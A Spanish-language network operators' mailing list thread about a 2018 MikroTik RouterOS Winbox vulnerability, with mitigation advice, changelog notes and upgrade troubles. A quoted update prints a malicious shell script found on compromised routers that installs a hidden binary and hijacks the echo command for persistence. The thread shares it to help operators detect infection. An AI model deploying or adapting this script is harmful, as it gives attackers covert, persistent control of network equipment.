[Lista ArNOG] Alerta seguridad Mikrotik

Ivan Chapero info en ivanchapero.com.ar
Mie Abr 25 23:19:46 ART 2018


Buenas,
la rama current no solo presenta el inconveniente cuando hay un combo de
bridges y switch-chip en uso, sino que al revertir RouterOS a la rama
bugfix-only se pierde toda la config ethernet relacionada a los
"master-port" (ahora re-lanzados como Bridge Hardware Offloading).

Por suerte ya esta la versión de la rama bugfix-only que resuelve esta
vulnerabilidad y pueden actualizar sus MK evitando ese quilombin:

What's new in *6.40.8* (2018-Apr-23 11:34):

*!) winbox - fixed vulnerability that allowed to gain access to an
unsecured router;*
*) certificate - fixed incorrect SCEP URL after an upgrade;
*) health - fixed empty measurements on CRS328-24P-4S+RM;
*) ike2 - use "policy-template-group" parameter when picking proposal as
initiator;
*) ipv6 - fixed IPv6 behaviour when bridge port leaves bridge;
*) routerboard - fixed "mode-button" support on hAP lite r2 devices;
*) ssh - fixed SSH service becoming unavailable;
*) traffic-flow - fixed IPv6 destination address value when IPFIX protocol
is used;
*) winbox - show "Switch" menu on cAP ac devices;
*) wireless - improved compatibility with BCM chipset devices;


Slds!

El 24 de abril de 2018, 7:06, Carriers <carriers en dainus.net> escribió:

> Estimados  ojo  con esa versión  yo tube un par de problemas  se me iban
> los ping altisimos . al parecer hay  cambios en el enrutamiento
>
> En 24 de abril de 2018, en 06:46, Juan Pablo Orsi <
> juanpablo en internetlocal.com.ar> escribió:
>
>> En el día de hoy MikroTik <http://mikrotik.com/> ha publicado un alerta
>> de seguridad
>> <https://forum.mikrotik.com/viewtopic.php?f=21&t=133533&p=656255> sobre
>> una vulnerabilidad en el RouterOS que afecta a todas las versiones desde
>> la v6.29.
>>
>> Según el alerta, indica que la vulnerabilidad ha sido descubierta por
>> ellos mismos y que recomiendan actualizar ASAP (lo mas pronto posible).
>>
>> La vulnerabilidad permite a una “*herramienta especial*” conectar al
>> puerto del Winbox y poder solicitar la base de datos de los usuarios del
>> sistema.
>>
>> Para tomar una medida al respecto se recomienda:
>>
>>    - Actualizar a la v6.42.1 y v6.43rc4 *Con precaución(leer mas
>>    adelante)
>>    - Cerrar el puerto del Winbox para el acceso publicomediante un *address
>>    list* y el *firewall* en el chain *input*
>>    - Limitar el rango de IP permitidos en *ip > service > winbox* a las
>>    redes locales unicamente.
>>    - Cambiar las contraseñas de los usuarios.
>>
>> Es importante tener en cuentaque en las recientes versiones del RouterOS existe
>> un nuevo esquema en el manejo del bridge, porque lo hay que tener
>> ciertas precauciones al actualizar debido a que se han dado casos de
>> actualizaciones fallidas en configuraciones que tienen bridge y utilizan el
>> chip switch.
>>
>> En caso de equipos que se encuentren en  producción y no es posible
>> actualizar rápidamente el sistema operativo, es mandatorio que se cierre
>> el acceso del winbox y cambiar las contraseñas de los usuarios.
>>
>> Por el momento no es posible conocer o detectar que el sistema ha sido
>> vulnerado, por lo que también se recomienda aplicar el punto anterior.
>>
>> https://forum.mikrotik.com/viewtopic.php?f=21&t=133533&p=656255
>> ACTUALIZACION:
>>
>> Algunos usuarios están reportan que detectan dos archivos dentro de
>> *files* con el nombre de *dnstest* con contenido binario y *save.sh* con
>> el siguiente contenido:
>>
>> #!/bin/ash
>> case "$PATH" in
>> */usr/local/bin*)
>> # old versions
>> dest="/usr/local/bin/"
>> ;;
>> *)
>> dest="/flash/bin/"
>> if [ ! -d "/flash/" ]; then
>> exit 1
>> fi
>> ;;
>> esac
>>
>> if [ -f $dest/.dnstest ]; then
>> rm $dest/.dnstest
>> fi
>> if [ -f $dest/echo ]; then
>> rm $dest/echo
>> fi
>> if [ -f $dest/.test ]; then
>> rm $dest/.test
>> fi
>>
>> mkdir -p $dest
>>
>> export PATH=$PATH:$dest
>> chmod a+x /flash/rw/pckg/dnstest
>> cp /flash/rw/pckg/dnstest $dest/.dnstest
>>
>> echo -e "#!/bin/ash\nusleep 180000000\ncp $dest.dnstest /tmp/.dnstest\n/tmp/.dnstest*" > $dest/.test
>> chmod +x $dest/.test
>>
>> echo -e "#!/bin/ash\n/$dest.test&\n/bin/echo \$*" > $dest/echo
>> chmod +x $dest/echo
>> /flash/rw/pckg/dnstest
>> rm save.sh
>>
>> El intento tiene el siguiente comportamiento:
>>
>> Como se observa en la siguiente captura, el primer acceso es un intento
>> fallido del winbox, por lo que se presume que tiene el acceso a la DB de
>> usuarios. Luego el acceso es con el usuario con permisos *full.*
>>
>> [image: Comportamiento de Acceso]
>>
>> ------------------------------
>>
>> Lista mailing list
>> Lista en arnog.com.ar
>> http://mailmancabase.interdotnet.com.ar/mailman/listinfo/lista
>>
>>
> _______________________________________________
> Lista mailing list
> Lista en arnog.com.ar
> http://mailmancabase.interdotnet.com.ar/mailman/listinfo/lista
>
>


-- 

*Ivan ChaperoÁrea Técnica y Soporte*
Fijo: 03464-470280 (interno 535) | Móvil:  03464-155-20282  | Skype ID:
ivanchapero
--
GoDATA Banda Ancha - CABLETEL S.A. | Av. 9 de Julio 1163 - 2183 - Arequito
- Santa Fe - Argentina
------------ próxima parte ------------
Se ha borrado un adjunto en formato HTML...
URL: <http://mailmancabase.interdotnet.com.ar/pipermail/lista/attachments/20180425/fbaf2650/attachment-0001.html>


Más información sobre la lista de distribución Lista